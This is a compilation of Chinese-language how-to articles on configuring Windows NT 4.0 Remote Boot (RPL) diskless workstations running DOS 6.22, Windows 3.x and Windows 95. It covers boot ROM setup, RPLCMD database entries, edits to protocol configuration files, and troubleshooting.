    W：用于修改工作站记录。
    每个命令执行后又有下面三个命令供选择：
    A：添加一条记录。
    B：删除一条记录。
    E：显示记录。
    其中最为常用的是A、C、V命令。

    三、准备BOOT ROM

    1. 根据实际使用的网卡（ACCTON 16XX、SN2000等）找到合适的BOOTROM
    Windows NT常用的BOOT ROM为RPL BOOT ROM，不同于Novell网常用的IPX BOOT ROM和ODI BOOT ROM。一种网卡的BOOTROM不一定兼容其他网卡，请选择合适的BOOT ROM。笔者有种RPL BOOT ROM可兼容大多数NE2000兼容网卡。Accton 16XX系列网卡使用的BOOT ROM型号为SW7145 。本文将以NE2000兼容网卡、NE2000兼容RPL BOOT ROM为例进行配置。
    2. 将网卡设置为可远程引导，并将中断设为3，IO设为300
    可用网卡驱动盘上SETUP之类的程序修改。
    3. 将BOOT ROM 插入网卡
    注意将BOOT ROM 的小缺口和网卡插座的小缺口相对应。

    四、DOS 无盘站的安装（以DOS 6.22、NE2000兼容网卡为例）

    1. 设置远程引导共享目录
    NT Server在远程启动服务（RPL服务）安装完成后会自动在C:\WINNT目录下创建RPL目录。将C:\WINNT\RPL目录下的RPLFILES目录设为共享,共享名为RPLFILES。
    2. 拷贝系统文件
    在NT服务器上将DOS系统文件拷入C:\RPL\RPLFILES\BINFILES目录下的DOS622目录中（其他DOS版本对应相应的目录）,并去掉IO.SYS、MSDOS.SYS的所有属性。至少要复制下面三个文件：
    IO.SYS
    MSDOS.SYS
    COMMAND.COM
    3. 拷贝NDIS驱动文件
    将网卡驱动盘上的NDIS驱动文件复制为C:\WINNT\RPL\BBLOCK\NDIS目录下NE.DOS文件。如网卡驱动盘上无NDIS驱动文件则将C:\WINNT\RPL\BBLOCK\NDIS目录中的NE2000.DOS复制为NE.DOS。
    4. 拷贝DOSBB.CNF文件
    在C:\WINNT\RPL\BBLOCK\NETBEUI目录下创建子目录NE，并将网卡驱动盘上的DOSBB.CNF文件拷贝到C:\WINNT\RPL\BBLOCK\NETBEUI\NE目录下。如网卡驱动盘上无DOSBB.CNF，可将C:\WINNT\RPL\BBLOCK\NETBEUI\NE2000目录下的DOSBB.CNF文件拷贝到C:\WINNT\RPL\BBLOCK\NETBEUI\NE目录下，并用EDIT 修改DOSBB.CNF，将DAT BBLOCK\NETBEUI\NE2000\PROTOCOL.INI一行改为
    DAT BBLOCK\NETBEUI\NE\PROTOCOL.INI，将DRV BBLOCK\NDIS\NE2000.DOS ~ ~ ~一行改为
    DRV BBLOCK\NDIS\NE.DOS ~ ~ ~。
    5. 拷贝PROTOCOL.INI文件
    将网卡驱动盘上的PROTOCOL.INI文件拷贝到C:\WINNT\RPL\BBLOCK\NETBEUI\NE目录下,如网卡驱动盘上无此文件，可将C:\WINNT\RPL\BBLOCK\NETBEUI\NE2000目录下的PROTOCOL.INI文件拷贝到C:\WINNT\RPL\BBLOCK\NETBEUI\NE目录下。
    6. 修改网卡远程引导数据库
    （1）用网卡设置程序（SETUP等）查看网卡内部ID号，并记录下来。（在Windows 95下用WINIPCFG命令，在Windows NT下用IPCONFIG /ALL命令可查看网卡的ID号。）
    （2）在WINDOWS NT命令提示符下运行RPLCMD命令。
    A）添加网卡厂商编码（即网卡ID号前6位）
    C:\WINNT\RPLCMD
    Adapter Boot Config Profile Vender Wksta [Quit]: V
    Add Del Enum: A
    VenderName=52544C (网卡ID号的前6位)
    VenderComment=ne-compatible
    B）添加网卡BOOK BLOCK 记录
    C:\WINNT\RPLCMD
    Adapter Boot Config Profile Vender Wksta [Quit] B
    Add Del Enum:A
    BootName=DOSNE （与下一步BootName对应）
    VenderName=52544C (网卡ID号的前6位)
    BbcFile=BBLOCK\NETBEUI\NE\DOSBB.CNF
    All other parameters are optional
    Boot Comment=ne-compatible
    WindowsSize=0
    C）修改系统配置记录
    C:\WINNT\RPLCMD
    Adapter Boot Config Profile Vender Wksta [Quit] C
    Add Del Enum: A
    ConfigName=DOS622NE （自定义的ConfigName，不能与已有的同名）
    BootName=DOSNE （与上一步BootName对应）
    DirName=DOS
    DirName2=DOS622
    FitsShared=FITS\DOS622.FIT （共享目录映射关系文件）
    FitsPersonal=FITS\DOS622P.FIT （专用目录映射关系文件）
    All other parameters are optional
    ConfigComment=NE-DOS-BOOT
    DirName3=
    DirName4=
    7．在服务器上建立远程启动配置
    （1）打开无盘工作站。
    （2）在服务器上配置Windows NT 支持的网卡。运行“远程启动管理器”，你将看到一台未经配置的无盘站。步骤：“开始”→“程序”→“管理工具（公用）”→“远程启动管理器”。
    （3）选择菜单“配置”→“检查配置”，然后单击“是”。
    （4）选择菜单“远程启动”→“新的配置文件”选择“NE-DOS-BOOT”，配置名键入“DOSRPL”。
    （5）选择未经配置无盘站的ID号，选择菜单“远程启动”→“转换适配器”选择DOSRPL，键入WKSTA名：USER1，这时你就可发现刚才配置的无盘站已经开始启动了。

    五、Windows无盘站的安装（以中文Windows 3.2为例）

    1. 在NT Server服务器C盘上建立“32” 目录，并使之共享，将Windows 3.2系统安装文件拷入32目录下。
    2. 启动该无盘站，以Admnistrator帐号登录，执行C:\>NET USE F: \\ NTSERVER \32。
    3. 在无盘站F盘执行SETUP /A，将Windows安装到C:\WIN目录中。
    4. 在无盘站C盘WIN目录下执行SETUP/N命令，选择EXPRESS方式安装，将Windows安装在C:\windows目录下内（勿选择更新任何已存在的Windows），并以EXPRESS安装。
    5. 在安装过程中，SETUP会修改CONFIG.SYS与CONFIG.SYS文件，如SETUP无法修改，选择取消，等复制完成后，将C:\WINDOWS目录下的CONFIG.WIN、AUTOEXEC.WIN文件内容复制到C盘根目录下的CONFIG.SYS与AUTOEXEC.BAT文件中。
    6. 将以下三行加入C:\WINDOWS\SYSTEM.INI中的[386enh]区段内。
    TimerCriticalSection=5000
    UniqueDosPSP=True
    PSPIncrement=2
    7. 将C:\WINDOWS中所有文件复制到C:\WKSTA.PRO\WIN目录下(XCOPY /S /E C:\WINDOWS C:\WKSTA.PRO\WIN)，这样所有使用“DOSRPL”配置名的无盘站都可以启动Windows。
    8. 重新启动该工作站，以普通无盘站用户帐号登录，执行WIN即可进入Windows。

    六、Windows 95无盘站的安装（以中文Windows 95为例）

    1. 简述
    目前，Windows 95可进行无盘站安装，Windows 97、Windows 98则不行，或许笔者没调试成功，请内行指教。要进行Windows 95无盘站的安装，必须有NETSETUP软件，在微软原版Windows 95光盘上的ADMIN \ NETTOOLS\NETSETUP目录下有该软件。
    2. 拷贝W95BB.CNF文件
    将网卡驱动盘上的W95BB.CNF文件拷贝到C:\WINNT\RPL\BBLOCK\NETBEUI\NE 目录下。如网卡驱动盘上无W95BB.CNF，可将C:\WINNT\RPL\BBLOCK\NETBEUI\NE2000目录下的W95BB.CNF文件拷贝到C:\WINNT\RPL\BBLOCK\NETBEUI\NE目录下。并用EDIT修改W95BB.CNF，将DAT BBLOCK\NETBEUI\NE2000\PROTOCOL.INI一行改为DAT BBLOCK\NETBEUI\NE\PROTOCOL.INI，将DRV BBLOCK\NDIS\NE2000.DOS ~ ~ ~一行改为DRV BBLOCK\NDIS\NE.DOS ~ ~ ~。（注：如有的网卡驱动盘上有DOSBB.CNF而没有W95BB.CNF则可将DOSBB.CNF拷贝为C:\WINNT\RPL\BBLOCK\NETBEUI\NE目录下W95BB.CNF文件，然后用EDIT编辑W95BB.CNF，将其中的EXE BBLOCK\I13.COM~~~一行改为EXE BBLOCK\W95I13.COM~~~，并和上面一样，要修改PROTOCOL.INI文件的路径和NE.DOS文件的路径。）
    3. 修改网卡远程引导数据库
    (1)修改BOOK BLOCK记录
    C:\WINNT\RPLCMD
    Adapter Boot Config Profile Vender Wksta [Quit] B
    Add Del Enum:A
    BootName=W95NE （与下一步BootName对应）
    VenderName=52544C (网卡ID号的前6位)
    BbcFile=BBLOCK\NETBEUI\NE\W95BB.CNF
    All other parameters are optional
    Boot Comment=ne-compatible
    WindowsSize=0
    （2）修改系统配置记录
    C:\WINNT\RPLCMD
    Adapter Boot Config Profile Vender Wksta [Quit] C
    Add Del Enum: A
    ConfigName=WIN95NE （自定义的ConfigName，不能与已有的同名）
    BootName=W95NE （与上一步BootName对应）
    DirName=DOS
    DirName2=WIN95
    FitsShared=FITS\WIN95.FIT （共享目录映射关系文件）
    FitsPersonal=FITS\WIN95P.FIT （专用目录映射关系文件）
    All other parameters are optional
    ConfigComment=NE-95-BOOT
    DirName3=
    DirName4=
    4．在服务器上建立远程启动配置
    （1）运行“远程启动管理器”，步骤为：“开始”→“程序”→“管理工具（公用）”→“远程启动管理器”。
    （2）选择菜单“配置”→“检查配置”，然后单击“是”。
    （3）选择菜单“远程启动”→“新的配置文件”选择“NE-95-BOOT”，配置名键入“95RPL”。
    5．安装SBS服务器（Server-Based Setup）
    （1）在NT Server服务器C盘上建立一目录“95SHARE”，并将之设为共享，共享名为“95SHARE”。
    （2）启动一台真正的Windows 95（有盘站），以具有系统管理员权限的用户登录到NT服务器。
    （3）在真正的Windows 95下执行95安装光盘上的ADMIN\NETTOOLS\NETSETUP目录下的NETSETUP.EXE文件，出现“服务器安装”对话框时，单击“设置路径”按钮，输入SBS服务器上要保存Windows 95文件的路径\\ NTSERVER\ 95SHARE，单击“确定”。
    （4）单击“安装”在弹出的对话框中指定Windows 95安装文件所在路径（例D:\WIN95）。开始安装，当询问是否要创建安装脚本，选择不创建，输入Windows 95标识码，将Windows 95文件复制到NT服务器中。
    （5）在NT Server服务器上执行NT Server安装光盘的CLIENTS\RPL\UPDATE\WIN95目录下WIN95SRV.BAT文件。
    例：WIN95SRV \\ NTSERVER\95SHARE
    6. 开始安装Windows 95无盘站
    （1）在服务器上创建Windows 95工作目录存放路径“95WORK”并使之共享，共享名为“95WORK”。
    （2）启动一台DOS6.22无盘工作站USER1登录到主域DOMAIN。
    （3）映射网络驱动器
    NET USE F: \\ NTSERVER\95SHARE
    NET USE G: \\ NTSERVER\95WORK
    （4）将工作站与服务器时间同步，执行C:\>NET TIME \\ NTSERVER /SET /YES。
    （5）在F盘执行SETUP /T:G:\USER1.TMP 按照画面提示进行安装。
    A）当出现“Server-Based Setup”对话框时选“Set up Windows to run from a network server”。
    B）当出现“Startup Method”对话框时，选择“Start Windows from the network (remote boot server)”。
    C）当出现“Machine Director”对话框时，输入路径G:\USER1。
    D）当出现“Setup Options”对话框时，选择“Custom”。
    E）当出现“Analyzing Your Computer”对话框时，选择“No,I want to modify the hardware list”。并且只选键盘、鼠标、标准VGA显示卡，否则，可能导致死机。
    F）当出现“Network Configuration”对话框时，选择网卡型号为NE2000兼容网卡，并将网卡的中断和IO设置正确（中断3，IO 300）。选择协议时一定要加上NetBEUI协议。
    G）出现“Identification”对话框时，设置“WORKGROUP”为该SBS服务器的主域名“DOMAIN”。
    H）等待文件复制完成后，按“重新开机”。
    （6）在服务器上运行C:\WINNT\RPL\BIN\WIN95CLT.BAT文件。
    WIN95CLT C:\95WORK\USER1 \\ NTSERVER 95RPL 其中95RPL为“六.4.(3)”中所创建的配置名。
    （7）在服务器上用EDIT修改C:\95SHARE目录中的MACHINES.INI文件内容添加下三行：
     [52544CXXXXXX] （Windows 95无盘站网卡ID号）
     SYSDATPATH=G:\USER1 （Windows 95无盘站工作目录）
     G=\\ NTSERVER\95WORK （Windows 95无盘站工作目录存放路径）
    （8）在服务器上启动“远程启动管理器”，将USER1的网卡配置文件改为Windows 95网卡配置文件NE-95-BOOT。
    （9）重新引导远程工作站，输入用户名、密码，就可看到Windows 95引导画面，等出现网卡ID号时输入用户名USER1。
    （10）稍等可出现Windows登录窗口，输入用户名、密码，即可进入Windows 95。
    7. 安装其他硬件驱动程序
    Windows 95正常运行后，单击“我的电脑”→“控制面板”→“添加新硬件”，让Windows 95自动查找硬件设备，并安装相应的驱动程序。
    8. 安装其他中文系统
    这时Windows 95虽然可正常运行，但是，有时汉字显示为乱码，可安装UCWIN等软件，这样Windows 95就可正常运行。
    在Windows NT无盘工作站中，MSDOS无盘工作站对硬件要求很低，286以上的机器即可。Windows无盘工作站要求稍高，要求硬件为386以上，内存4MB以上才可正常运行。Windows 95无盘工作站要求机器硬件为486以上，内存8MB以上，最好为16M.

返回


NT网的无盘工作站远程登陆

《一键清理系统垃圾》

NT网的无盘工作站远程登陆

远程启动服务是 Windows NT Server 的一项功能，它支持远程工作站使用服务器硬盘上的软件启动 MS-DOS 和 Windows。使用远程启动服务可以增加网络安全性，并提供给网络系统管理员更大的控制权, 具有容易集中升级软件，降低购买和维护工作站的成本等优点。目前，在NT网络资料中还没有涉及到模板配置文件中不存在的一般网卡的远程启动配置资料，大家都很关心如何解决它的配置问题。
  下面作者以中文NT Server 4.0 为例, 介绍NT网络中使用一般网卡(无盘)工作站的远程启动安装过程, 供大家参考。

  一、在NT服务器上网络“协议”中加入 DLC 通讯协议和 NetBEUI 通讯协议，因为远程启动服务要请求 DLC 通讯协议和 NetBEUI 通讯协议；在网络的“服务”中加入远程启动服务。
  二、在网络“服务”中启动远程启动服务，运行“远程启动管理器”，首先取得(无盘)工作站的网卡ID号, 然后为其建立轮廓文件和远程启动数据库记录，这点正是一般网卡配置的难点。过程如下:
  1)取远程工作站的网卡ID号
  A)打开远程工作站。工作站实际上不启动，但带Boot-ROM的网卡向服务器发送启动请求。
  B)在服务器端“远程启动管理器”的“查看”菜单上，单击“刷新”。这时远程工作站的网卡记录就会出现,这个网卡记录包括了被启动的远程工作站的网卡ID号。若此网卡不是模板文件中指定的网卡,则会在网卡号之后出现无确定标识提示,这时需要手动设置。以Accton EN166x网卡为例,此卡与NE2000卡兼容,可按NE2000卡来配置。过程如下:
  ①将NT SERVER光盘上clients\ rpl\ update目录拷贝到硬盘上, 修改目录中的Ne200cpt.rpl文件,将其中NE2000-compatible的ID 号004033改为Accton EN166x网卡的ID号 0000E8;
  ②在DOS窗口中,键入 RPLCMD <Ne200cpt.rpl ,生成新的网卡数据库。这时再回到“远程启动管理器”中,就可看到网卡标识已更改为 NE2000 Compatible;
  2)建立(无盘)工作站的轮廓文件
  在“远程启动管理器”中,打开“配置”菜单，单击“检查配置”，这样可以检查远程启动工作站的可用操作系统，若在rpl\ rplfiles\binfiles\dos622目录中拷入了DOS622系统文件，则在“新建配置文件”对话框的配置框中出现DOS622的有关选项;单击“修复安全性”，则将覆盖\system root\RPL 目录中的权限，为远程启动工作站创建账号及创建RPLUSER本地账号，并更新远程启动工作站中 Lanman.ini 文件中的域项以便与服务器自身的域/工作组匹配。然后在“远程启动”菜单中，单击“新建配置文件”，其对话框如图1所示。 在“配置文件名”框中，键入配置文件名；在“配置”框中，选择与你的网卡及指定操作系统相一致的某种配置。比如3Com EtherLink III 网卡就选择 DOS6.22 3Com EtherLink III ACCTON EN166x 网卡就选择 DOS6.22 Novell NE2000。
  3)为工作站建立远程启动数据库记录
  在“远程启动管理器”中,选择一个网卡记录,并在“远程启动”菜单上，单击“转换适配器”。
  A)在“工作站名”框中，键入工作站名，用这个名字就为远程工作站建立一个NT用户帐号。
  B)在“说明”框中，键入工作站说明。框中已有网络适配器自身提供的说明。
  C)选定两类配置之一 。若此工作站与其它工作站共享配置文件，则选择“共享”；若此工作站必须使用配置文件的个人副本以便自定义工作站环境，则选择“个人”。
  D)在“配置文件中的工作站”框中，为该工作站选择配置文件。
  E)击“添加”按钮。
  这时打开远程工作站,远程工作站就可通过NT服务器启动到MS-DOS状态，远程工作站上操作系统命令文件所在目录是: C: \ DOS, 它与服务器上的目录\ RPL\RPLFILES\BITFILE\DOS622是对应的。远程(无盘)工作站通过NT服务器可以被引导到MS-DOS状态，接下来就可以进行进一步的软件安装，如:Windows31,Windows95 及其应用程序的共享，在此就不多叙。

返回


NT无盘站的软件安装

《一键清理系统垃圾》

NT无盘站的软件安装

    由于NT下的Win 95无盘工作站既节约经费又方便管理，因此在一般学校的学生机房中比较流行。但是使用Win 95无盘站后,则要求把学生练习所需要的软件：如WPS2000、Office 97、FoxBASE、FoxPro、UCDOS、TT、WT等全部安装在服务器上。我们可以把这些软件的安装分为三类：网络版的安装、单机版的安装和直接拷贝。
    网络版软件的安装
    所谓网络版的软件，实际上是指这个软件可以在服务器上创建一个安装点，工作站上软件的安装通过这个安装点具体进行。比如Office 97的安装，首先在一台无盘站上共享服务器光驱，并映射一个共享目录。然后把光盘放入服务器光驱，在Win 95工作站上运行SETUP/A，完成服务器上的管理员级安装。再在工作站上进入此共享目录，运行安装程序进行安装。实际上它与建Win 95无盘站时，安装Win 95的过程是同一道理。建立文件服务器实质就是建立一个管理员级安装点，运行Win 95安装程序实质就是用户级安装。
    单机版软件的安装
    单机版软件则不具有创建安装点的功能，只需直接进行用户安装。比如WPS2000的安装，同样共享服务器的光驱，并映射出一个共享目录。把光盘放入服务器光驱后，在Win 95工作站上运行安装程序，其后的安装过程与在Win 95单机上安装WPS2000是一样的。
    DOS下运行的软件
    对于在DOS下面运行的比如CAI、WT、TT、FoxBASE等软件，它们的运行不涉及Win 95下的注册表问题，只需直接拷贝到一个独立的共享目录中就可运行。
    完成所有的软件安装后最好在Win 95启动中建立一个批处理文件，用它映射出安装软件时所使用的共享目录，并且映射的盘符要与你在安装时所映射的盘符必须一致。
    对于多台Win 95无盘站的软件安装则比较简单。当你在第一台Win 95上把所有的软件装好后，用它的机器目录与其他未装软件的无盘站的机器目录比较，找出后者没有的所有文件及文件夹并复制过来，重新启动机器，则其他无盘站也可以运行这些软件了.

返回


Win 95无盘站调试中问题的解决

《一键清理系统垃圾》

Win 95无盘站调试中问题的解决

    笔者成功地安装了Win 95的无盘站，也曾在Win 95无盘站的安装和使用过程中遇到一些问题，下面笔者就这些问题和解决方法作些介绍。

    □machine.ini文件问题

    在安装过程中，需要在服务器上编辑SBS目录下的machine.ini文件，在该文件中为每一台工作站设置机器目录路径，格式如下：
    [网卡地址]
    SYSDATPATH=G:\机器目录
    G=\\服务器名\机器共享目录名
    ……
    但按规定格式编辑该文件后，启动无盘工作站时，提示读取machine.ini文件错误。经反复检查试验，工作站仍无法启动。
    经检查原因是：Win 95所提供的原machine.ini文件内容为UNICODE双字节代码，因此，工作站无法读取该文件内容。
    解决办法是：利用写字板程序新建一个内容以ANSI单字节代码表示的该文件，编辑完内容后覆盖到SBS文件夹下即可。

    □command.com问题

    本校学生在进行五笔字型练习时，采用DOS下的wt.exe程序，但此时无盘站无法切换到MS-DOS方式。
    经检查发现SBS文件夹下提供的command.com在Win 95无盘站无法正确执行。
    解决办法是：采用“Winnt\RPL\RPLfiles\Binfiles\Win 95”文件夹下的command.com（若需要，可将其拷贝到无盘站能够访问到的任意一个文件夹下），为其建立一个快捷方式即可。

    □将NT4.0安装到DOS扩展分区的问题

    如果将Windows NT Server 4.0安装到DOS扩展分区内，则必须安装到该分区的第一个逻辑盘中（比如D:盘），否则Windows NT 可能将无法完成安装（比如安装到F:盘），重新启动时，NT提示无法识别引导扇区，因而无法进入下一步安装过程。

    □利用服务器上的CD-ROM执行Netsetup.exe

    在安装基于服务器的SBS时，如果工作站上没有光盘驱动器，可以通过远程访问服务器上的CD-ROM执行Net-setup.exe进行安装。但该工作站必须有硬盘，且必须通过本地硬盘启动进入Win 95。
    在安装基于服务器的SBS时，如果工作站上没有光盘驱动器，可以通过远程访问服务器上的CD-ROM执行Net-setup.exe进行安装。但该工作站必须有硬盘，且必须通过本地硬盘启动进入Win 95。
    注：Netsetup.exe只能在Win 95/98。环境下运行。

    □将SBS文件夹设为只读权限

    为防止SBS文件夹下的系统文件被随意删除或移动，可将该文件夹针对那些从无盘站登录的用户设为只读权限。因为无盘站的注册库等文件是在各自的机器目录内，基本不需要向SBS文件夹写入数据。
    同时还可将所有机器目录内容复制到另一个文件夹下（不设为共享）。这样，当某一个机器目录的内容被破坏时，可以直接在服务器上快速地恢复该目录的内容，而不需要到工作站上去恢复。

返回


WINDOWS NT无盘ＤOS6.22工作站的安装

《一键清理系统垃圾》

WINDOWS NT无盘ＤOS6.22工作站的安装

一、服务器端远程启动服务的安装
    在NT服务器中，打开控制面板→网络，安装如下项目。
    (１)NetBEUIT通信协议。
    (２)DLC网络协议。
    (３)远程启动（RPL）服务。

    以下的步骤均按WINDOWSNT4.0(中文版)已经被安装在D:\WINNT目录下，远程启动被安装在D:\WINNT\RPL目录的情况下运行，并且已经给定该服务器的名称为：NTSRV。

    二、启动远程启动服务，并将其设为“自动”
    在“控制面板→服务”中启动远程启动服务并将之设为自动。

    三、在服务器端安装工作站所需启动文件及其它的MS-DOS文件
    (１)将远程启动服务器(NTSVR)中的D:\WINNT\RPL\RPLFILES目录设为共享，共享名称为RPLFILES。
    (２)将Dos6.22启动文件及其它所需文件复制到远程启动服务器(NTSVR)的D:\WINNT\RPL\RPLFILES\BINFILES\DOS622目录中(请使用英文版的Dos6.22)。

    复制DOS启动必备的三个文件(一般在服务器端做)
    ATTRIB-S -H IO.SYS
    ATTRIB-S -H MSDOS.SYS
    COPY IO.SYS D:\RPL\RPLFILES\BINFILES\DOS622
    COPY MSDOS.SYS D:\RPL\RPLFILES\BINFILES\DOS622
    COPY COMMAND.COM D:\RPL\RPLFILES\BINFILES\DOS622

    复制其它所需DOS文件：
    COPY *.* D:\RPL\RPLFILES\BINFILES\DOS622

    四、在服务器端安装支持网卡远程启动文件(以下所说的网卡均指工作站的网卡，与服务器端的网卡无关)
    (１)将网卡驱动盘中的Dos启动文件复制到D:\WINNT\RPL\BBLOCK\NDIS文件夹内(都是以.dos为扩展名，你可以先看看D:\WINNT\RPL\BBLOCK\NDIS原有的文件).
    (２)在D:\WINNT\RPL\BBLOCK\NETBEUI下创建子目录ETHNE
    (３)将NT的Dos配置文件DOSBB.CNF复制到D:\WINNT\RPL\BBLOCK\NETBEUI\ETHNE文件夹内。
    (４)将NTPROTOCOL.INI拷到D:\WINNT\RPL\BBLOCK\NETBEUI\ETHNE文件夹中。
    查看以上复制的两个文件是不是如下形式，如果不是，请手修改！！
    dosbb.cnf结构如下：(只需修改带注释的两行，你可以先到ne2000目录中得到dosbb.cnf，然后修改再存到对应的目录)

    ; DOS on Novell NE2000 Ethernet
    BASE D0H
    RPL BBLOCK\RPLBOOT.SYS
    LDR BBLOCK\RPLSTART.COM ~
    DAT BBLOCK\NETBEUI\Ethne\PROTOCOL.INI 注：协议文件存放位置，请指向你的网卡目录
    DRV BBLOCK\RPLDISK.SYS ~ ~ ~
    EXE BBLOCK\RPLPRO1.COM ~ 2 ~
    EXE BBLOCK\I13.COM ~ ~ ~
    EXE BBLOCK\RPLBIND2.EXE ~ ~
    EXE BBLOCK\PROTMAN.EXE ~ ~
    EXE BBLOCK\RPLBIND1.EXE ~ ~
    ;DRV BBLOCK\IPXNDIS.DOS ~ ~ ~
    ;DRV BBLOCK\TCPDRV.DOS /I:C:\LANMAN.DOS ~ ~
    EXE BBLOCK\NETBEUI\NETBEUI.EXE ~ 10 ~
    DRV BBLOCK\NDIS\pcind.DOS ~ ~ ~ 注：指向你的网卡驱动程序，注意对应，这里是pcind.dos
    DRV BBLOCK\PROTMAN.DOS /I:C:\LANMAN.DOS ~ M

    procotol.ini如下(同dosbb.cnf一样，可以到ne2000目录中拿这个文件修改后存到对应目录)
    (看到了，都是一个协议对应一个设置，如果你没用到的协议，应该不改也没问题，不过应该全部都改过来)

    [protman]
     drivername = protman$
     dynamic = yes
     priority = netbeui

    [netbeui_xif]
     drivername = netbeui$
     bindings = pcind_nif 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     names = 6
     ncbs = 12
     packets = 20
     pipeline = 10
     sessions = 6
     stacksize = 512
     lanabase = 0

    [xnsnb_xif]
     drivername = xnsnb$
     bindings = pcind_nif 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     load = xnsnb[cbr]
     lanabase = 1

    [xnstp_xif]
     drivername = xnstp$
     bindings = pcind_nif 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     load = xnstp[ub]
     lanabase = 1

    [tcpip_xif]
     drivername = TCPIP$
     disabledhcp = (TCPIP_NO_DHCP)
     ipaddress0 = (TCPIP_ADDRESS)
     subnetmask0 = (TCPIP_SUBMASK)
     defaultgateway0 = (TCPIP_GATEWAY)
     tcpsegmentsize = 1450
     tcpwindowsize = 1450
     nbsessions = 6
     load = tcptsr[c],tinyrfc[c],emsbfr[cr]
     unload = "unloadt /notsr[dc]"
     bindings = pcind_nif 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     lanabase = 1

    [ipx_xif]
     drivername = ipx$
     load = ipxmark[u],ipx[u]
     unload = ipxrel[c]
     bindings = pcind_nif 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     lanabase = 1

    [msdlc_xif]
     drivername = msdlc$
     bindings = pcind_nif 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     load = msdlc[ub]
     unload = msdlc[u]

    [pcind_nif] 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名
     drivername = pcind$ 注：pcind是网卡驱动名中pcind.dos的基本名，请注意对应你的网卡驱动名

         五、在服务器端建立网卡远程启动数据库
    (１)添加该网卡厂商数据(即网卡的卡号前6位，你打开工作站，屏幕会有提示)
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:V
    AddDelEnum:A 注：如果你第二次做，要先用D将原有数据删除
    VenderName=5254AB (工作站网卡卡号的前六位，以下请对应此卡号)
    VenderComment=
    (２)添加该网卡的BootBlock(即启动文件)
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:B
    AddDelEnum:A　注：如果你第二次做，要先用D将原有数据删除
    BootName=BOOT1
    VenderName=5254AB
    BbcFile=BBLOCK\NETBEUI\ETHNE\DOSBB.CNF
    Allotherparametersareoptional(以下参数为选择性的)
    BootComment=
    WindowsSize=

    (３)添加该网卡的配置文件（本配置将为模板）
    D:\WINNT>RPLCMD
    AdapterBootConfigProfileVenderWksta[Quit]:C
    AddDelEnum:A　注：如果你第二次做，要先用D将原有数据删除
    ConfigName=CONFIG1
    BootName=BOOT1 注：请与上一步的BootName保持一致
    DirName=DOS
    DirName2=DOS622 注：应该是指binfiles\dos622目录
    FitShared=FITS\dos622.fit
    FitPersonal=FIT\dos622p.fit
    Allotherparametersareoptional(以下参数为选择性的)
    ConfigComment=My Config for Dos622
    DirName3=
    DirName4=

    六、在服务器端建立Profile(配置文件)来设置远程启动工作站的工作环境
    (１)检查远程启动的配置
    “远程启动管理器→配置→检查配置”
    注：该步操作在安装“远程启动管理器”、添加或删除所支持的操作系统以及自行添加让WINDOWSNT支持的网卡后，必须进行。
    (２)“远程启动管理器→配置→修复安全性”
    (３)建立远程启动工作站的工作环境配置文件（Profile）
    A.“远程启动管理器→远程启动→新的配置文件”。
    B.在“配置文件名”处填入profile的名称如Config1。
    C.在“配置”中选择“My config for Dos622”
    D.单击“确定”。

    七、添加远程启动无盘工作站（可选用以下两种方法之一）
    (１)手工方式
    “远程启动管理器→远程启动→新的工作站”
    依次输入“适配器ID”（即网卡号）、“工作站名”、“描述”、“密码”，并选择“配置类型”和“配置文件中的Wksta"。
    最后一项请选择“My config for Dos622”

    (２)自动方式（在得不到远程启动工作站网卡号时）
    A.打开远程启动工作站。
    B.在远程启动服务器端启动“远程启动管理器”，发现步骤A产生的不完整记录。
    C.选择该不完整记录。
    D.按“远程启动管理器→远程启动→转换适配器”进行转换。余下步骤同手工方式。

返回


WINDOWS NT无盘工作站技术

《一键清理系统垃圾》

WINDOWS NT无盘工作站技术

        WINDOWSNT无盘工作站在计算机网络教室、网吧以及一些公司的局域网中有着广泛的应用。其优点在于：
    ①可以取消工作站端的软盘驱动器和硬盘，减少了硬件费用支出
    ②减少对工作站的维护工作及负担
    ③防止公司的宝贵数据被带出公司
    ④避免通过工作站感染病毒
    ⑤可以对网络上应用软件资源实行集中管理。下面就几种形式的WINDOWSNT无盘工作站的创建分别给予介绍。

    一、DOS无盘工作站的创建
    １、服务器端远程启动服务的安装
    (１)安装NetBEUIT通信协议。
    (２)安装DLC网络协议。
    (３)安装远程启动（RPL）服务。

    以下的步骤均按WINDOWSNT4.0（中文版）已经被安装在D:\WINNT目录下，远程启动被安装在D:\WINNT\RPL目录的情况下运行，并且已经给定该服务器的名称为：NT401。

    ２、启动远程启动服务，并将其设为“自动”

    ３、在服务器端安装工作站所需启动文件及其它的MS-DOS文件
    (１)将远程启动服务器（NT401）中的D:\WINNT\RPL\RPLFILES目录设为共享，共享名称为RPLFILES。
    (２)从任何一台一般MS-DOS工作站登录，并连接远程服务器（NT401）上的共享目录RPLFILES。例如：NETUSEF:\\NT401\RPLFILES。
    (３)将该一般工作站的MS-DOS启动文件及其它所需文件复制到远程启动服务器（NT401）的D:\WINNT\RPL\RPLFILES\BINFILES\DOS×××目录中，其中×××代表DOS的不同版本。以下以DOS6..22版本为例，并假设要
    复制的MS-DOS文件在该一般工作站的硬盘C:上。(注意：不能在BINFILES目录中自行添加其它目录，只能利用存在的DOS×××)。

    复制DOS启动必备的三个文件：
    ATTRIB-S-HC:\IO.SYS
    ATTRIB-S-HC:\MSDOS.SYS
    COPYC:\IO.SYSF:\BINFILES\DOS622
    COPYC:\MSDOS.SYSF:\BINFILES\DOS622
    COPYC:\COMMAND.COMF:\BINFILES\DOS622

    (如果使用IBM的PC-DOS，需把BINFILES\DOS622中的IBMBIO.COM和IBMDOS.COM进行:RENIBMBIO.COMIO.SYS及RENIBMDOS.COMMSDOS.SYS)

    复制其它所需DOS文件：
    COPYC:\DOS\*.*F:\BINFILES\DOS622
    (注：该步骤3可以直接从含有DOS文件的软盘上完成)

    ４、在服务器端安装支持网卡远程启动文件（以ACCTONEN1688T为例，将该网卡驱动盘插入A盘）
